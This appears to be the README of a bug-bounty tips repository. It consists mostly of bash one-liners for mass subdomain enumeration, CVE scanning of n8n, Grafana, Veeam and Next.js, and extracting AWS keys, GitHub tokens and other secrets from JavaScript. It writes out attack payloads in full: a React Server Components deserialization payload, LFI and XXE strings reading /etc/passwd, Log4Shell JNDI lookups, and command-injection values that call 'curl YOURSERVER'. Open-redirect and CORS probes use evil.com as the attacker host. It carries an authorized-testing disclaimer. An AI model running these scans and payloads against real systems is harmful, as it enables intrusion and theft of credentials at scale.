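#!/usr/bin/env bash
# grafana_triage.sh - hedged sketch: report the Grafana version and whether /login
# reflects a protocol-relative redirect target in the Location header.
# Usage: ./grafana_triage.sh https://grafana.example.com
url="${1:?usage: $0 <base-url>}"
marker="evil.example"   # placeholder marker host

ver=$(curl -sk "$url/api/frontend/settings" | grep -oE '"version":"[0-9]+\.[0-9]+\.[0-9]+"' | grep -oE '[0-9]+\.[0-9]+\.[0-9]+')
echo "[*] $url Grafana version: ${ver:-unknown}"

loc=$(curl -skI "$url/login?redirect=//$marker" | grep -i '^location:')
if echo "$loc" | grep -qi "$marker"; then
    echo "[!] $url reflects the redirect target ($loc) - investigate further"
else
    echo "[-] $url: redirect target not reflected"
fi
```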
10 Oneliners to hunt CVE-2026 vulnerabilities across subdomains at scale!
subfinder -d target.com -silent | httpx -silent -title -tech-detect | tee alive_subs.txt | while read line; do echo "$line" | grep -qiE "(n8n|grafana|d-link)" && echo "[CVE-2026 TARGET] $line"; done | anew cve2026_targets.txt
subfinder -d target.com -silent | httpx -silent | xargs -I@ -P30 sh -c 'curl -s "@/rest/settings" 2>/dev/null | grep -q "versionCli" && echo "@"' | tee n8n_subs.txt | xargs -I@ nuclei -u @ -t http/cves/2026/CVE-2026-21858.yaml -silent
cat subdomains.txt | httpx -silent | xargs -I@ -P20 sh -c 'curl -s "@/rest/node-types" 2>/dev/null | grep -qi "git" && curl -s "@/rest/settings" 2>/dev/null | grep -qE "versionCli.*1\.(([0-9]|[0-9][0-9]|1[01][0-9]|120)\.[0-9]+)" && echo "[CVE-2026-21877 VULN] @"' | anew n8n_git_vuln.txt
subfinder -d target.com -silent | httpx -silent -path /api/frontend/settings -match-regex '"version":"' | tee grafana_subs.txt | xargs -I@ -P15 sh -c 'curl -sI "@/login?redirect=//evil.com" 2>/dev/null | grep -qi "location.*evil" && echo "[CVE-2025-4123 VULN] @"'
subfinder -d target.com -silent | httpx -silent | nuclei -tags cve2026 -severity critical,high -c 50 -o cve2026_nuclei_results.txt
cat subdomains.txt | httpx -silent | xargs -I@ -P25 sh -c 'for path in /webhook /webhook-test /rest/workflows; do curl -s -o /dev/null -w "%{http_code}" "@$path" 2>/dev/null | grep -qE "^(200|401|403)$" && echo "[N8N ENDPOINT] @$path" && break; done' | anew n8n_webhooks.txt
subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -iE "(d-link|router|gateway|modem|dsl)" | tee router_subs.txt | awk '{print $1}' | xargs -I@ -P10 sh -c 'curl -s "@/dnscfg.cgi" 2>/dev/null | grep -qi "dns" && echo "[CVE-2026-0625 POTENTIAL] @"'
subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -i "veeam" | tee veeam_subs.txt | awk '{print $1}' | xargs -I@ -P10 sh -c 'curl -s "@/api/v1/version" 2>/dev/null | grep -qE "13\.0\.[01]\.[0-9]+" && echo "[CVE-2025-59470 VULN] @"'
subfinder -d target.com -silent | httpx -silent -json | jq -r 'select(.technologies != null) | "\(.url) \(.technologies[])"' | grep -iE "(n8n|grafana|veeam|next)" | while read url tech; do echo "[CVE-2026 CHECK] $url - $tech"; done | anew cve2026_tech_fingerprint.txt
domain="target.com"; mkdir -p recon_$domain && cd recon_$domain && subfinder -d $domain -silent | httpx -silent -title -tech-detect -json -o httpx_out.json && cat httpx_out.json | jq -r '.url' | nuclei -t ~/nuclei-templates/http/cves/2026/ -c 30 -o cve2026_vulns.txt && echo "[+] Found $(wc -l < cve2026_vulns.txt) CVE-2026 vulnerabilities!"
🎯 Pro Tip: Combine with notify to get real-time alerts: ... | notify -silent -provider slack
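notify reads its providers from `~/.config/notify/provider-config.yaml`. A hedged sketch of wiring up the Slack provider used in the pro tip; the field names follow the projectdiscovery notify documentation as best I recall and should be checked against your installed version, and the webhook URL is a placeholder:

```bash
# Hedged sketch: create a Slack provider config for notify (field names are assumptions -
# confirm against the notify docs for your version). The webhook URL is a placeholder.
mkdir -p ~/.config/notify
cat > ~/.config/notify/provider-config.yaml <<'EOF'
slack:
  - id: "recon"
    slack_channel: "recon-alerts"
    slack_username: "notify"
    slack_webhook_url: "https://hooks.slack.com/services/XXXX/XXXX/XXXX"
EOF

# Example: pipe any of the one-liners above into notify
# nuclei -l targets.txt -tags cve2026 -silent | notify -silent -provider slack -id recon
```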
🎯 10 Elite Oneliners for comprehensive reconnaissance - Multi-source enumeration, ASN discovery, JS analysis & more! 🎯
subfinder -d target.com -all -silent | anew subs.txt && assetfinder --subs-only target.com | anew subs.txt && amass enum -passive -norecursive -noalts -d target.com | anew subs.txt && cat subs.txt | httpx -silent -threads 200 -tech-detect -status-code -title -o alive_with_tech.txt
Combines Subfinder + Assetfinder + Amass for maximum subdomain coverage, then validates with httpx + technology fingerprinting
echo "target.com" | dnsx -silent -resp-only -a | xargs -I{} whois -h whois.cymru.com {} | awk '{print $1}' | grep -E "AS[0-9]+" | xargs -I{} sh -c 'whois -h whois.radb.net -- "-i origin {}" | grep -Eo "([0-9.]+){4}/[0-9]+"' | mapcidr -silent | dnsx -silent -ptr -resp-only | anew asn_discovered_hosts.txt
Discovers ASN, enumerates IP blocks, performs reverse DNS to find hidden subdomains
cat alive.txt | xargs -P 50 -I{} sh -c 'echo {} | waybackurls & echo {} | gau --threads 10 --blacklist png,jpg,gif,svg,woff,ttf & echo {} | katana -d 3 -jc -kf all -silent' | uro | anew all_urls.txt
Parallel URL collection from Wayback Machine, Common Crawl, AlienVault + active crawling with smart deduplication
cat alive.txt | katana -silent -em js,json -jc -d 2 | httpx -silent -mc 200 | tee js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} | tee /tmp/js_$$.tmp | grep -oE "(api_key|apikey|api-key|secret|token|password|aws_access|AKIA[0-9A-Z]{16})" && cat /tmp/js_$$.tmp | grep -oE "/(api|v[0-9]|admin|internal)/[a-zA-Z0-9_/?=&-]+" | sort -u' | anew js_secrets_and_endpoints.txt
Finds JS files, extracts hardcoded secrets (API keys, tokens, AWS keys) and hidden API endpoints
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt_subs.txt | dnsgen - | shuffledns -d target.com -r /usr/share/wordlists/resolvers.txt -silent -o permuted_subs.txt && cat permuted_subs.txt | httpx -silent -o alive_permuted.txt
CT logs enumeration + intelligent permutation (api → api-dev, api-staging) with mass DNS resolution
cat subs.txt | naabu -silent -top-ports 1000 -exclude-cdn -c 50 | sed 's/:/ /g' | awk '{print $1":"$2}' | httpx -silent -probe -status-code -title -tech-detect -follow-redirects -random-agent -o ports_with_web_services.txt
Fast port scan + discovers web apps running on unusual ports (8080, 8443, 3000, etc)
ORG="target"; for dork in "org:$ORG password" "org:$ORG api_key" "org:$ORG secret" "org:$ORG token" "org:$ORG aws_access" "org:$ORG credentials"; do echo "[+] Searching: $dork"; gh search repos "$dork" --limit 100 | grep "^$ORG" | tee -a github_secrets.txt; sleep 2; done
Automated GitHub dorking for secrets, credentials and sensitive data exposure
cat all_urls.txt | grep -oE '(s3\.amazonaws\.com/[a-zA-Z0-9._-]+|[a-zA-Z0-9._-]+\.s3\.amazonaws\.com|storage\.googleapis\.com/[a-zA-Z0-9._-]+|[a-zA-Z0-9._-]+\.blob\.core\.windows\.net)' | sort -u | tee cloud_buckets.txt | xargs -I{} sh -c 'curl -sI https://{} | grep -q "200\|403" && echo "[+] {} - Accessible"'
Extracts and validates misconfigured cloud storage buckets from collected URLs
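The `200|403` grep above treats both codes as accessible; in practice a 200 on the bucket root usually means the listing is public, 403 means the bucket exists but listing is denied, and 404 means it does not exist. A hedged helper that makes the distinction explicit, assuming the input format produced by `cloud_buckets.txt` above:

```bash
#!/usr/bin/env bash
# bucket_triage.sh - hedged sketch: classify each bucket host from cloud_buckets.txt.
# Usage: ./bucket_triage.sh cloud_buckets.txt
while read -r bucket; do
    code=$(curl -s -o /dev/null -w "%{http_code}" "https://$bucket" --max-time 10)
    case "$code" in
        200) echo "[LISTABLE]   $bucket" ;;   # listing (or index) returned - highest priority
        403) echo "[EXISTS]     $bucket" ;;   # bucket exists but listing is denied
        404) echo "[NOT FOUND]  $bucket" ;;
        *)   echo "[HTTP $code] $bucket" ;;
    esac
done < "${1:?usage: $0 <buckets-file>}"
```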
cat all_urls.txt | uro | grep "=" | unfurl keys | sort -u | tee all_params.txt && cat all_urls.txt | gf xss | tee xss_params.txt && cat all_urls.txt | gf ssrf | tee ssrf_params.txt && cat all_urls.txt | gf sqli | tee sqli_params.txt && cat all_urls.txt | gf redirect | tee redirect_params.txt
Extracts unique parameters and categorizes by vulnerability type (XSS, SSRF, SQLi, Redirect)
DOMAIN="target.com"; DATE=$(date +%Y%m%d); mkdir -p recon_$DATE; cd recon_$DATE; subfinder -d $DOMAIN -all -silent | anew subs_$DATE.txt; cat subs_$DATE.txt | httpx -silent -threads 200 -o alive_$DATE.txt; cat alive_$DATE.txt | nuclei -t exposures/ -silent -o new_exposures_$DATE.txt; diff ../recon_$(date -d "yesterday" +%Y%m%d)/subs_*.txt subs_$DATE.txt 2>/dev/null | grep ">" | awk '{print $2}' > new_subs_$DATE.txt; [ -s new_subs_$DATE.txt ] && notify -silent -bulk < new_subs_$DATE.txt
Full persistent recon pipeline - detects new assets daily and sends notifications
🎯 Pro Tip: Run oneliner #10 via cron for 24/7 monitoring:
0 */6 * * * /path/to/recon_monitor.sh
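The cron entry assumes a `recon_monitor.sh` wrapper exists. A hedged sketch of one way to write it, reusing the diff-against-yesterday idea from oneliner #10; the domain, output root, and notify provider are placeholders:

```bash
#!/usr/bin/env bash
# recon_monitor.sh - hedged sketch of the cron wrapper referenced above.
# Re-runs passive enumeration, diffs against the previous run, and alerts on new assets.
set -euo pipefail

DOMAIN="target.com"                 # placeholder target
BASE="$HOME/recon/$DOMAIN"          # placeholder output root
TODAY=$(date +%Y%m%d)
YESTERDAY=$(date -d "yesterday" +%Y%m%d)

mkdir -p "$BASE/$TODAY" && cd "$BASE/$TODAY"

subfinder -d "$DOMAIN" -all -silent | anew subs.txt >/dev/null
httpx -l subs.txt -silent -threads 200 -o alive.txt

# New subdomains = lines present today but not yesterday (empty on the first run).
if [ -f "$BASE/$YESTERDAY/subs.txt" ]; then
    comm -13 <(sort "$BASE/$YESTERDAY/subs.txt") <(sort subs.txt) > new_subs.txt
else
    : > new_subs.txt
fi

if [ -s new_subs.txt ]; then
    nuclei -l new_subs.txt -t exposures/ -silent -o new_exposures.txt || true
    notify -silent -bulk -provider slack < new_subs.txt
fi
```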
🎯 10 Oneliners to extract endpoints, secrets and hidden APIs from JavaScript files! 🎯
cat alive.txt | katana -silent -em js -jc -d 3 | grep -E "\.js(\?|$)" | httpx -silent -mc 200 -content-length | awk '$NF > 500 {print $1}' | anew js_files.txt && mkdir -p js_downloaded && cat js_files.txt | xargs -P 30 -I{} sh -c 'curl -sk {} -o js_downloaded/$(echo {} | md5sum | cut -d" " -f1).js 2>/dev/null'
Discovers all JS files with Katana, filters by size (>500 bytes), downloads for offline analysis
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null' | grep -oE '["'"'"'](\/[a-zA-Z0-9_\-\.\/]+(\?[a-zA-Z0-9_\-\.=&]+)?)['"'"'"]' | sed 's/[\"'"'"']//g' | sort -u | grep -E "^/" | grep -vE "\.(css|png|jpg|svg|gif|woff|ico)$" | anew js_endpoints.txt
Extracts all relative API paths from JavaScript, filters static assets
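The relative paths in `js_endpoints.txt` only become actionable once they are resolved against a live host. A hedged sketch that replays every extracted path against one base URL and keeps the status codes worth a manual look; the base URL is a placeholder:

```bash
#!/usr/bin/env bash
# probe_js_endpoints.sh - hedged sketch: resolve relative paths from js_endpoints.txt
# against one base host and keep responses worth a manual look.
# Usage: ./probe_js_endpoints.sh https://app.example.com js_endpoints.txt
base="${1:?usage: $0 <base-url> <endpoints-file>}"
file="${2:?usage: $0 <base-url> <endpoints-file>}"

# Paths in the file start with "/", so simply prepend the base URL and probe with httpx.
sed "s|^|$base|" "$file" | httpx -silent -status-code -content-length -mc 200,201,204,301,302,401,403
```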
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" && echo "Found in: {}"' | tee aws_keys_js.txt
Hunts for AWS Access Key IDs (AKIA, ABIA, ACCA, ASIA patterns)
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AIza[0-9A-Za-z_-]{35}|[a-z0-9-]+\.firebaseio\.com|[a-z0-9-]+\.firebaseapp\.com)" && echo "[SOURCE] {}"' | tee google_firebase_keys.txt
Extracts Google API keys and Firebase database/app URLs
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "([a-zA-Z0-9_-]+\.s3\.amazonaws\.com|s3\.amazonaws\.com\/[a-zA-Z0-9_-]+|[a-zA-Z0-9_-]+\.s3\.[a-z0-9-]+\.amazonaws\.com)" | sort -u' | anew s3_buckets_js.txt && cat s3_buckets_js.txt | xargs -I{} sh -c 'curl -sI https://{} 2>/dev/null | head -1 | grep -qE "200|403" && echo "[ACCESSIBLE] {}"'
Finds S3 buckets in JS and validates accessibility
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[01])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" && echo "[SOURCE] {}"' | sort -u | tee internal_ips_js.txt
Discovers internal/private IP addresses leaked in JavaScript (10.x, 172.16-31.x, 192.168.x)
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(https://hooks\.slack\.com/services/[A-Za-z0-9/]+|[MN][A-Za-z\d]{23,}\.[\w-]{6}\.[\w-]{27})" && echo "[SOURCE] {}"' | tee slack_discord_js.txt
Extracts Slack webhook URLs and Discord bot tokens
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59}|-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----)" && echo "[SOURCE] {}"' | tee github_privkeys_js.txt
Finds GitHub personal access tokens (all formats) and private key headers
⚡ 9. Email Addresses + Hidden Subdomains in JS
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u' | anew emails_js.txt && cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "https?://[a-zA-Z0-9._-]+\.target\.com[a-zA-Z0-9./?=_-]*"' | unfurl domains | sort -u | anew hidden_subdomains_js.txt
Extracts email addresses and hidden subdomains referenced in JavaScript
TARGET="target.com"; mkdir -p js_recon_$TARGET && cat alive.txt | katana -silent -em js -jc -d 3 | grep -iE "\.js(\?|$)" | httpx -silent -mc 200 | anew js_recon_$TARGET/js_urls.txt && cat js_recon_$TARGET/js_urls.txt | xargs -P 30 -I{} sh -c 'curl -sk {} 2>/dev/null | tee -a js_recon_$TARGET/all_js.txt' && grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/aws_keys.txt; grep -oE "AIza[0-9A-Za-z_-]{35}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/google_keys.txt; grep -oE "ghp_[a-zA-Z0-9]{36}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/github_tokens.txt; grep -oE '["'"'"']/[a-zA-Z0-9_/-]+["'"'"']' js_recon_$TARGET/all_js.txt | tr -d '\"'"'"'' | sort -u > js_recon_$TARGET/endpoints.txt; echo "[+] JS Recon Complete! Check js_recon_$TARGET/"
Complete JS recon pipeline: discovers JS files, downloads all, extracts AWS/Google/GitHub keys and API endpoints
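Once the JS is on disk, a single labeled pass over the download directory is faster than re-running one grep per secret type. A hedged sketch reusing the same patterns as the one-liners above; the directory name is a placeholder and bash 4+ is assumed for associative arrays:

```bash
#!/usr/bin/env bash
# js_secret_sweep.sh - hedged sketch: one labeled pass over already-downloaded JS files,
# using the same regexes as the one-liners above.
# Usage: ./js_secret_sweep.sh js_downloaded
dir="${1:-js_downloaded}"

declare -A patterns=(
  ["AWS key"]="(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}"
  ["Google API key"]="AIza[0-9A-Za-z_-]{35}"
  ["GitHub token"]="gh[pousr]_[a-zA-Z0-9]{36}"
  ["Slack webhook"]="https://hooks\.slack\.com/services/[A-Za-z0-9/]+"
  ["Private key header"]="-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"
)

for label in "${!patterns[@]}"; do
    # -H keeps the file name next to each match so findings stay attributable.
    grep -rHoE "${patterns[$label]}" "$dir" 2>/dev/null | sed "s/^/[$label] /"
done
```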
🎯 Pro Tip: Use nuclei -t exposures/tokens/ on discovered secrets to validate if they're active!
Critical RCE in React Server Components & Next.js - Under active exploitation! Added to CISA KEV
cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt
curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'
cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt
# Create payload.json (safe math check - no RCE)
echo '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt
curl -X POST https://target.com -H "Next-Action: check" -F "0=@payload.json" -F "1=@trigger.txt" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"
subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt
cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'
cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt
shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt
nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt
subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt
curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500
cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt
⚠️ Affected: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | ✅ Fix: Update to React 19.0.1/19.1.2/19.2.1
🎯 Key Detection: Apps accepting the Next-Action header + RSC deserialization = Potential RCE
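A hedged single-target probe for the detection signal described above: it only checks whether a POST carrying the `Next-Action` header is processed and whether an `x-action-redirect` header comes back, without sending any deserialization payload. The status-code interpretation mirrors the one-liners and is an assumption:

```bash
#!/usr/bin/env bash
# next_action_probe.sh - hedged sketch: non-destructive check of whether a host processes
# the Next-Action header on POST (the indicator the one-liners above key on).
# Usage: ./next_action_probe.sh https://app.example.com
url="${1:?usage: $0 <url>}"

code=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" \
    -H "Next-Action: probe" -H "Content-Type: text/plain" --data "0" --max-time 10)

case "$code" in
    200|400|500) echo "[!] $url answered HTTP $code to a Next-Action POST - candidate for deeper testing" ;;
    404|000)     echo "[-] $url: no server-action handling detected (HTTP $code)" ;;
    *)           echo "[?] $url: HTTP $code - inconclusive" ;;
esac

# x-action-redirect in the response headers is another indicator used above.
curl -s -D - -o /dev/null -X POST "$url" -H "Next-Action: probe" --data "0" --max-time 10 \
    | grep -qi "x-action-redirect" && echo "[!] $url returned an x-action-redirect header"
```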
echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5
cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"
cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txt
cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"
cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"
cat js.txt | xargs -I@ curl -s @ | grep -E "(__proto__|constructor\.prototype)" | anew proto_pollution.txt
cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200
cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txt
cat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txt
cat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txt
cat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"
cat urls.txt | grep -iE "\.(xml|soap)" | qsreplace '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'
cat urls.txt | qsreplace "\`curl YOURSERVER\`" | httpx -silent
cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silent
cat alive.txt | xargs -I@ gowitness single @ -o screenshots/
cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txt
curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}'
cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt
cat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txt
cat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txt
cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txt
cat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txt
cat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txt
cat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txt
cat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txt
curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"
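The mmh3 favicon hash computed above is mainly useful as a pivot: searching Shodan for `http.favicon.hash:<value>` surfaces other hosts serving the same favicon, which are often staging or origin servers. A hedged sketch, assuming the `shodan` CLI is initialised and the `mmh3` Python module is installed:

```bash
#!/usr/bin/env bash
# favicon_pivot.sh - hedged sketch: hash a target's favicon and pivot through Shodan.
# Usage: ./favicon_pivot.sh https://target.com
url="${1:?usage: $0 <base-url>}"

# Same hashing approach as the one-liner above (base64-encode, then mmh3).
hash=$(curl -sk "$url/favicon.ico" | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))")
echo "[*] favicon hash: $hash"

# Hosts sharing a favicon hash frequently belong to the same application footprint.
shodan search "http.favicon.hash:$hash" --fields ip_str,port,hostnames
```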
| Engine | Link | Description |
|---|---|---|
| Shodan | shodan.io | IoT & device search |
| Censys | censys.io | Internet scan data |
| Fofa | fofa.info | Cyberspace search |
| ZoomEye | zoomeye.org | Cyberspace mapping |
| Hunter | hunter.how | Asset discovery |
| Netlas | netlas.io | Attack surface |
| GreyNoise | greynoise.io | Internet scanners |
| Onyphe | onyphe.io | Cyber defense |
| CriminalIP | criminalip.io | Threat intel |
| FullHunt | fullhunt.io | Attack surface |
| Quake | quake.360.net | Cyberspace search |
| Leakix | leakix.net | Leak detection |
| URLScan | urlscan.io | URL analysis |
| DNSDumpster | dnsdumpster.com | DNS recon |
| crt.sh | crt.sh | Certificate search |
| SecurityTrails | securitytrails.com | DNS history |
| Pulsedive | pulsedive.com | Threat intel |
| VirusTotal | virustotal.com | File/URL analysis |
| PublicWWW | publicwww.com | Source code search |
| Grep.app | grep.app | GitHub code search |
| Wordlist | Link | Use Case |
|---|---|---|
| SecLists | GitHub | Everything |
| FuzzDB | GitHub | Fuzzing |
| Assetnote | wordlists.assetnote.io | Web content |
| OneListForAll | GitHub | Combined |
| jhaddix all.txt | GitHub | Directories |
| commonspeak2 | GitHub | Real-world |
- Web Application Hacker's Handbook
- Real-World Bug Hunting by Peter Yaworski
- Bug Bounty Bootcamp by Vickie Li
| Hunter | Hunter | Hunter |
|---|---|---|
| @bt0s3c | @MrCl0wnLab | @stokfredrik |
| @Jhaddix | @TomNomNom | @NahamSec |
| @zseano | @pry0cc | @pdiscoveryio |
| @jeff_foley | @haaborern | @0xacb |
Click to see contribution guidelines
1. Fork the Repository
   git clone https://github.com/KingOfBugbounty/KingOfBugBountyTips.git
   cd KingOfBugBountyTips
2. Create a New Branch
   git checkout -b feature/your-contribution
3. Add Your Content
   - Add new one-liners with proper documentation
   - Include source references and explanations
   - Follow the existing format and structure
4. Submit Pull Request
   - Write a clear description of your changes
   - Reference any related issues
   - Wait for review and feedback
- New bug bounty one-liners and techniques
- Tool installation guides and tips
- Additional resources and references
- Bug fixes and improvements
- Documentation enhancements
- Translations to other languages
If this repository helped you in your bug bounty journey, consider supporting the project!
Give this repository a star if you found it helpful!
╔═══════════════════════════════════════════════════════════════╗
║                      ⚠️  LEGAL NOTICE  ⚠️                       ║
╠═══════════════════════════════════════════════════════════════╣
║  This repository is for EDUCATIONAL PURPOSES ONLY              ║
║                                                                 ║
║  ✅ DO: Use for authorized security testing                     ║
║  ✅ DO: Learn and understand the techniques                     ║
║  ✅ DO: Contribute and share knowledge                          ║
║                                                                 ║
║  ❌ DON'T: Use for unauthorized testing                         ║
║  ❌ DON'T: Use for malicious purposes                           ║
║  ❌ DON'T: Violate laws or regulations                          ║
║                                                                 ║
║  The authors are NOT responsible for any misuse or damage      ║
║  caused by this information. Always test responsibly!          ║
╚═══════════════════════════════════════════════════════════════╝
| Resource | Link |
|---|---|
| Homepage | King of Bug Bounty Tips |
| KingRecon DOD | Automated Recon Tool |
| BugBuntu OS | Download Here |
| YouTube Channel | OFJAAAH |
| Telegram Group | Join Community |
| Twitter/X | @ofjaaah |
| LinkedIn | Connect |
| Report Issues | GitHub Issues |
| Security Issues | Security Advisory |
To all contributors, bug bounty hunters, and the security community who make this project possible!
Last Updated: January 2026 | Version: 4.5
╔══════════════════════════════════════════════════════════════════╗
║          "Stay curious, stay ethical, stay hungry" 🏴‍☠️            ║
║                        Happy Hunting!                             ║
╚══════════════════════════════════════════════════════════════════╝
Made with ❤️ by the Bug Bounty Community
